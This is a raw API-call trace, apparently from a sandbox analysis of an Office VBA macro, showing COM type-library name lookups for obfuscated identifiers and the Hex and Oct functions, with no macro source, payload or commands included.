[0069.434] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="fDQcCx4A", lHashVal=0x10c360, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80b3a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="fDQcCx4A") returned 9 [0069.434] ITypeComp:RemoteBind (in: This=0x665bd30, szName="fDQcCx4A", lHashVal=0x10c360, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.434] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fDQcCx4A") returned 0x10c360 [0069.434] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="fDQcCx4A" | out: _Dst="fDQcCx4A") returned 0x0 [0069.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="fDQcCx4A") returned 9 [0069.434] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.434] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="fDQcCx4A", lHashVal=0x10c360, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.434] IUnknown:Release (This=0x665ba50) returned 0xd [0069.434] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.434] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="fDQcCx4A", lHashVal=0x10c360, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.434] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.434] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.434] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="fDQcCx4A", lHashVal=0x10c360, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.434] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.434] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.434] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="fDQcCx4A", lHashVal=0x10c360, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.434] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80b3a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="fDQcCx4A") returned 9 [0069.434] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="fDQcCx4A", lHashVal=0x10c360, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.434] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.434] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80b3a | out: _Dst=0x67c2d40) returned 0x0 [0069.435] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_fDQcCx4A") returned 0x109ae9 [0069.435] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_fDQcCx4A" | out: _Dst="_B_var_fDQcCx4A") returned 0x0 [0069.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_fDQcCx4A") returned 16 [0069.435] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.435] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_fDQcCx4A", lHashVal=0x109ae9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.435] IUnknown:Release (This=0x665ba50) returned 0xd [0069.435] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.435] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_fDQcCx4A", lHashVal=0x109ae9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.435] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.435] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.435] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_fDQcCx4A", lHashVal=0x109ae9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.435] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.435] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.435] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_fDQcCx4A", lHashVal=0x109ae9, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.435] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.435] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.435] IUnknown:Release (This=0x665ba50) returned 0xd [0069.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12bce, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_fDQcCx4A") returned 16 [0069.435] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_fDQcCx4A", lHashVal=0x109ae9, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x43006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x43006300000000, pDummy=0x0) returned 0x0 [0069.435] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80b3a | out: _Dst=0x144ec0) returned 0x0 [0069.435] ITypeComp:RemoteBind (in: This=0x665ba60, szName="oAAAXA", lHashVal=0x109779, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80b66, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="oAAAXA") returned 7 [0069.435] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="oAAAXA", lHashVal=0x109779, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80b66, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="oAAAXA") returned 7 [0069.436] ITypeComp:RemoteBind (in: This=0x665bd30, szName="oAAAXA", lHashVal=0x109779, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.436] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oAAAXA") returned 0x109779 [0069.436] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="oAAAXA" | out: _Dst="oAAAXA") returned 0x0 [0069.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="oAAAXA") returned 7 [0069.436] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.436] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="oAAAXA", lHashVal=0x109779, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.436] IUnknown:Release (This=0x665ba50) returned 0xd [0069.436] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.436] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="oAAAXA", lHashVal=0x109779, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.436] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.436] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.436] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="oAAAXA", lHashVal=0x109779, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.436] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.436] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.436] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="oAAAXA", lHashVal=0x109779, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.436] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80b66, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="oAAAXA") returned 7 [0069.436] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="oAAAXA", lHashVal=0x109779, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.436] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.436] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80b66 | out: _Dst=0x67c2d40) returned 0x0 [0069.436] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_oAAAXA") returned 0x1011e3 [0069.436] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_oAAAXA" | out: _Dst="_B_var_oAAAXA") returned 0x0 [0069.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_oAAAXA") returned 14 [0069.436] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.436] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_oAAAXA", lHashVal=0x1011e3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.436] IUnknown:Release (This=0x665ba50) returned 0xd [0069.437] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.437] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_oAAAXA", lHashVal=0x1011e3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.437] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.437] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.437] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_oAAAXA", lHashVal=0x1011e3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.437] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.437] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.437] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_oAAAXA", lHashVal=0x1011e3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.437] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.437] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.437] IUnknown:Release (This=0x665ba50) returned 0xd [0069.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12bfe, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_oAAAXA") returned 14 [0069.437] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_oAAAXA", lHashVal=0x1011e3, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x58004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x58004100000000, pDummy=0x0) returned 0x0 [0069.437] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80b66 | out: _Dst=0x144ec0) returned 0x0 [0069.437] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tAAUDB", lHashVal=0x1070d9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80b8e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAAUDB") returned 7 [0069.437] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tAAUDB", lHashVal=0x1070d9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80b8e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAAUDB") returned 7 [0069.437] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tAAUDB", lHashVal=0x1070d9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.437] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAAUDB") returned 0x1070d9 [0069.438] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="tAAUDB" | out: _Dst="tAAUDB") returned 0x0 [0069.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="tAAUDB") returned 7 [0069.438] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.438] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tAAUDB", lHashVal=0x1070d9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.438] IUnknown:Release (This=0x665ba50) returned 0xd [0069.438] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.438] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tAAUDB", lHashVal=0x1070d9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.438] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.438] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.438] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tAAUDB", lHashVal=0x1070d9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.438] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.438] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.438] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tAAUDB", lHashVal=0x1070d9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.438] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80b8e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAAUDB") returned 7 [0069.438] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tAAUDB", lHashVal=0x1070d9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.438] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.438] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80b8e | out: _Dst=0x67c2d40) returned 0x0 [0069.438] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tAAUDB") returned 0x10eb82 [0069.438] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_tAAUDB" | out: _Dst="_B_var_tAAUDB") returned 0x0 [0069.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_tAAUDB") returned 14 [0069.439] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.439] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tAAUDB", lHashVal=0x10eb82, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.439] IUnknown:Release (This=0x665ba50) returned 0xd [0069.439] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.439] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tAAUDB", lHashVal=0x10eb82, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.439] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.439] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.439] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tAAUDB", lHashVal=0x10eb82, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.439] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.439] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.439] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tAAUDB", lHashVal=0x10eb82, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.439] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.439] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.439] IUnknown:Release (This=0x665ba50) returned 0xd [0069.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12c2e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_tAAUDB") returned 14 [0069.439] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tAAUDB", lHashVal=0x10eb82, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x44005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x44005500000000, pDummy=0x0) returned 0x0 [0069.439] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80b8e | out: _Dst=0x144ec0) returned 0x0 [0069.439] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.439] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.439] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.439] IUnknown:Release (This=0x665ba50) returned 0xd [0069.439] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.439] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.439] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.439] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.439] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.440] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.440] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.440] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.440] IUnknown:Release (This=0x665ba50) returned 0xd [0069.440] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.440] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.440] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.440] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.440] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.440] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.440] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.440] IUnknown:Release (This=0x665ba50) returned 0xd [0069.440] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.440] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.440] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.440] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.440] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.440] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.440] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.440] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.440] IUnknown:Release (This=0x665ba50) returned 0xd [0069.441] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.441] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.441] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.441] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.441] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.441] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.441] IUnknown:AddRef (This=0x665ba50) returned 